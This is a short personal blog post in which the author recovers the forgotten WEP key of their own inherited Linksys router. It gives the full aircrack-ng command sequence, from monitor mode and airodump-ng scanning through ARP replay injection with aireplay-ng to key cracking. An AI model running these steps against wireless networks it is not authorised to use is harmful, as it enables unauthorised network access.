I recently inherited a disused Linksys wireless router. The previous owner had long since forgotten the WEP passphrase. Of course, it's trivial to reset a Linksys router back to the factory defaults, which I would use eventually. But before I did that, I thought I would try something else first...
Having never tried to crack a WEP key before, I thought this would be a nice opportunity to learn how. There are plenty of excellent, detailed tutorials out there. And this blog post isn't one of them.
It's merely a "note to self" -- what worked for me at this point in time. So if you're looking for a detailed explanation of the process or perhaps support in your quest, "These aren't the droids you're looking for. Move along, move along."
First, I created a directory to store the captured packets.
DIR=$(mktemp -d)I then installed the utilities from the 10.10 archive.
cd $DIR
sudo apt-get install aircrack-ngNext, I checked my interface.
sudo airmon-ng check wlan0And I stopped any services using wlan0 (avahi-daemon, NetworkManager, wpa_supplicant). Then I started monitoring mode on the interface.
sudo airmon-ng start wlan0Now, I needed to scan the airwaves, looking for my access point.
sudo airodump-ng mon0When I recognized the ESSID I was looking for, I noted the BSSID and Channel number. Then, I started replaying ARP requests.
sudo aireplay-ng -3 -b $bssid -h 00:00:00:00:00:00 wlan0I let this run for a while in one window. At the same time, I started capturing replies in another window.
sudo airodump-ng --channel $channel --bssid $bssid --write dump wlan0And in a third window, I started analyzing the captured data, looking for the key.
sudo aircrack-ng *capIt took about ~7500 ARP requests and IVs gathered over ~2 hours to divine the key, but it worked eventually, like a charm!
:-Dustin
